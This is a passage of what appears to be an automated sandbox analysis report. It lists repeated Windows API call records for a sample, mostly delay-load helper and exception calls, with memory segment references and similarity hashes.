    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 57bdc4220e0a0bee308cef4b74ce90bbdcacfe96494dcea5fa9ee5424a2f02e6
    • Instruction ID: c5373e9216d3fc5633b73e9c52eac9c4223f304f6aafd11071a63ff298e3e688
    • Opcode Fuzzy Hash: 57bdc4220e0a0bee308cef4b74ce90bbdcacfe96494dcea5fa9ee5424a2f02e6
    • Instruction Fuzzy Hash: 30B012D52684037C338461557C02E3B023DD7C0B13370803FF807C8041D84C0E082032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e7a580cb185b18976dbecfa7a1ccbc2068d8897dfb48973e1e538e09d84787df
    • Instruction ID: cdbf8abc7f282170388fd4d81779b7dcf395286702b077d296bb25140064832a
    • Opcode Fuzzy Hash: e7a580cb185b18976dbecfa7a1ccbc2068d8897dfb48973e1e538e09d84787df
    • Instruction Fuzzy Hash: C3B0129926A5037C33C462547C12E3B022EC7C0B23330813FF807C8041D84C0D482032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d6f40d4656cbfc92aa934aaa907fd5bf4b98d462df7f6803dd5409127e96a604
    • Instruction ID: 8f8fe90f4b06be0488b69130d504a8cf0cfe7a6af8adcc37449a25c2900126e7
    • Opcode Fuzzy Hash: d6f40d4656cbfc92aa934aaa907fd5bf4b98d462df7f6803dd5409127e96a604
    • Instruction Fuzzy Hash: F8B0128536A4037C33C461547D16E3B022EC7C0B23330803FF807CC041D88C0E092032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: f70bca872958eed095adf016ea78ed438a9d6237e504885d57ab64c8496d335f
    • Instruction ID: 14b94daa614e925cfea1d78e069acc246aad6324233fbc5e6be09f427952bb26
    • Opcode Fuzzy Hash: f70bca872958eed095adf016ea78ed438a9d6237e504885d57ab64c8496d335f
    • Instruction Fuzzy Hash: 75B012852794037C73C461547C12E3B026EDBC0B23370803FF807C8041D84C0D082032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0f014e090e69919a1afff7dd9432d7dcc102efdaf7ab58f2065a0f8119bf6ad0
    • Instruction ID: 952e34db80fb148cb447cc7c51746bd538171ff316e64a346a453b805265aaf3
    • Opcode Fuzzy Hash: 0f014e090e69919a1afff7dd9432d7dcc102efdaf7ab58f2065a0f8119bf6ad0
    • Instruction Fuzzy Hash: 26B012852684037C338461647C02E7F026DC7C1B13330C03FFD07C4042D84C0D092032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9f8e2dc70ead11fe2aa7227d9c7c2d3c6fdeb0ef0eedc1ca1c6a7ffd5183dfc0
    • Instruction ID: 9d4d2db4b18c347589fb94b848b8b4838fbae229866e6c1d09c435bc31db756c
    • Opcode Fuzzy Hash: 9f8e2dc70ead11fe2aa7227d9c7c2d3c6fdeb0ef0eedc1ca1c6a7ffd5183dfc0
    • Instruction Fuzzy Hash: 03B012852686037C33C461547C02E7F026DC7C0B13330813FF807C4041D84C0D482032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 33c3c9785b427c1bc275a914dd8782b9d8308a644bd0d9435e51b91e08f736d1
    • Instruction ID: b3cc06421512ce8fdc2e8a35977da4031022e6ad50852b10b1796b0e58dbf29d
    • Opcode Fuzzy Hash: 33c3c9785b427c1bc275a914dd8782b9d8308a644bd0d9435e51b91e08f736d1
    • Instruction Fuzzy Hash: 3EB012A53684037C338461547D02E7F02ADC7C0B13730803FF807C8041D88C0E092032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9c696704364f3575fbe33c4d87064e179a507766de083f32b7df84d4cc18f1db
    • Instruction ID: 3336db40088f55a24435789591807f5c696344198c42b2770b8c4ab02a7f2cf5
    • Opcode Fuzzy Hash: 9c696704364f3575fbe33c4d87064e179a507766de083f32b7df84d4cc18f1db
    • Instruction Fuzzy Hash: 6FB012862684037C338461547C02E7F026DD7C0B13370813FF807C4041E84C0D082032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 5eb89158da5a9b489a5f4a0daecf110d75c4cfb0d5c7eb2c68fa6795475ff487
    • Instruction ID: 7aa19fba1eda5b1b2845f7cbb79f6dd8e2e6979756fa3998a8c9a422493fcdde
    • Opcode Fuzzy Hash: 5eb89158da5a9b489a5f4a0daecf110d75c4cfb0d5c7eb2c68fa6795475ff487
    • Instruction Fuzzy Hash: 34B092852688036C339461546C02A3B0229D781B12330812FB906C4042D84809492032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e82bc350226c43bd0a9bc043410b52e83457f02e7a322483ba6092c29ab40003
    • Instruction ID: 73d4c47ecb8e146cb7df8a1fbb5526544e57f8aa412744e09f53d7595ce2b93b
    • Opcode Fuzzy Hash: e82bc350226c43bd0a9bc043410b52e83457f02e7a322483ba6092c29ab40003
    • Instruction Fuzzy Hash: A9B092856689037C339461546C02A3B0229D780B12330822FB906C4041D8480D482072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d3669fb0c5b1a1713930fc31bdd3314accf5ef1007f11481d634b82b6911d2d3
    • Instruction ID: 7ded029621a1edb73fd115e15057eed5c0dc884af7b9af94f6cf8fa8590e3515
    • Opcode Fuzzy Hash: d3669fb0c5b1a1713930fc31bdd3314accf5ef1007f11481d634b82b6911d2d3
    • Instruction Fuzzy Hash: 32B012C12A8A037E334465987C02D3B019CCBC4B73330853BF906C5481E98C4C4D1072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: be2a82634d70bf757f76890f72df93592b6578c337118c4b985b63b2e68edd1c
    • Instruction ID: 750d23aed69d7269be2f215731617221c0cbe7c586440791ca85032a9d851c5b
    • Opcode Fuzzy Hash: be2a82634d70bf757f76890f72df93592b6578c337118c4b985b63b2e68edd1c
    • Instruction Fuzzy Hash: F5B012C12E89037E324465987C12E3B015CD7C4B73330843BF906C5481E88C4C0D1172
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d7f817ac72671c41b1c47d5f6c72f159baf6e4d4a94b4635f0bfec5a900c06c6
    • Instruction ID: 42cc4df4ef467c68110d2640831abfbbdf2b8f321f4833eb4565204124edb91a
    • Opcode Fuzzy Hash: d7f817ac72671c41b1c47d5f6c72f159baf6e4d4a94b4635f0bfec5a900c06c6
    • Instruction Fuzzy Hash: 28B012C12B8C037E32446598BC12E3B015CD7C8B73330863BF906C5081E84C5C0D1076
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a09de431664efa95d8c55735df2262dba91c968d1ad53b3f566a2a04d9c056f0
    • Instruction ID: fc9e6a63eea48c1ef59168dde0f82518c90cb0ab14bbe6afa2c4c8093ccd9b8e
    • Opcode Fuzzy Hash: a09de431664efa95d8c55735df2262dba91c968d1ad53b3f566a2a04d9c056f0
    • Instruction Fuzzy Hash: 45B092852A86027C22042150AE02C3B011DCB84B12330803BFA06D84829898080910B6
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 74b0d9ec52659cdc94c1c3bd553d51a63574f938f4029d8433e1251ab9321d84
    • Instruction ID: a1381cf8316126d05e9c562a7e1023ea5ba3f45f93f3c1cd0d13090443479c2f
    • Opcode Fuzzy Hash: 74b0d9ec52659cdc94c1c3bd553d51a63574f938f4029d8433e1251ab9321d84
    • Instruction Fuzzy Hash: 3CB012813B8503BC334461646D03D3B011DCBC8F13330813BF806C41C2D88C0C4C11B2
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 832c05ca6fdff3fe41678e8167e091b08b1efafc061a11673736552531762a02
    • Instruction ID: feedc1ad93f2676415ffdc428000792486bdaaf06a7232d2a71b7b556f7e7384
    • Opcode Fuzzy Hash: 832c05ca6fdff3fe41678e8167e091b08b1efafc061a11673736552531762a02
    • Instruction Fuzzy Hash: E5B092812A8402AC224461646E02D3B011DD788B12330803BF906C80829888080911B2
    APIs
    • DestroyWindow.USER32(?,00000000,0005E640,?,?,00000001,?,?,0005C999,000760F0,000A1CF0,000A1CF0,00001000,?,00000000,?), ref: 0005A241
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: DestroyWindow
    • String ID:
    • API String ID: 3375834691-0
    • Opcode ID: de6c185696efd7b77323bbe2f89271d6b4c1f1d2a5b8abe15a19a5fd2870a6fc
    • Instruction ID: 6af37ac62c9f95d9838bc4dadc5eef4ea9e7e15cdb289e454e783dd49e5472fa
    • Opcode Fuzzy Hash: de6c185696efd7b77323bbe2f89271d6b4c1f1d2a5b8abe15a19a5fd2870a6fc
    • Instruction Fuzzy Hash: 42C08C31011B208BD7310B08EA0939276E0BB05B13F00C82D90964646083B5A884CA40
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6f5e0afea8be073e11fee1fe5b03fd2e88191d043b5451f94df9fda75508e33d
    • Instruction ID: 31372f444546e02e1b3a61088f9a6e598b3e4e6aa6fce552a91a70216af2ccb9
    • Opcode Fuzzy Hash: 6f5e0afea8be073e11fee1fe5b03fd2e88191d043b5451f94df9fda75508e33d
    • Instruction Fuzzy Hash: E5A0019A6A9503BC779862617D16D7B022ECAD4B62370892FF907C8482A8881A596476
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 23cdcc9e05bc867ab2f240004a016e7fee5a9bc3caf94815c490a8807bef7ec9
    • Instruction ID: 31372f444546e02e1b3a61088f9a6e598b3e4e6aa6fce552a91a70216af2ccb9
    • Opcode Fuzzy Hash: 23cdcc9e05bc867ab2f240004a016e7fee5a9bc3caf94815c490a8807bef7ec9
    • Instruction Fuzzy Hash: E5A0019A6A9503BC779862617D16D7B022ECAD4B62370892FF907C8482A8881A596476
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a9687710e747596f571dc1eea3c932aa2b77d425292e6ec84d4443a22aabefdf
    • Instruction ID: 31372f444546e02e1b3a61088f9a6e598b3e4e6aa6fce552a91a70216af2ccb9
    • Opcode Fuzzy Hash: a9687710e747596f571dc1eea3c932aa2b77d425292e6ec84d4443a22aabefdf
    • Instruction Fuzzy Hash: E5A0019A6A9503BC779862617D16D7B022ECAD4B62370892FF907C8482A8881A596476
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 817f2325c3a5ea743c4209055fe6ea98628680f5f9b23d83d64bc151b60dcc43
    • Instruction ID: e0d0b336947c1359232c95f6e38fa0a0cb9f2c3c5ecf2e68cba6fdffe3ad6a19
    • Opcode Fuzzy Hash: 817f2325c3a5ea743c4209055fe6ea98628680f5f9b23d83d64bc151b60dcc43
    • Instruction Fuzzy Hash: BDA012C11A44033D310429503D02C3B011DC6D0B72330843BF902C40816848080D1031
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
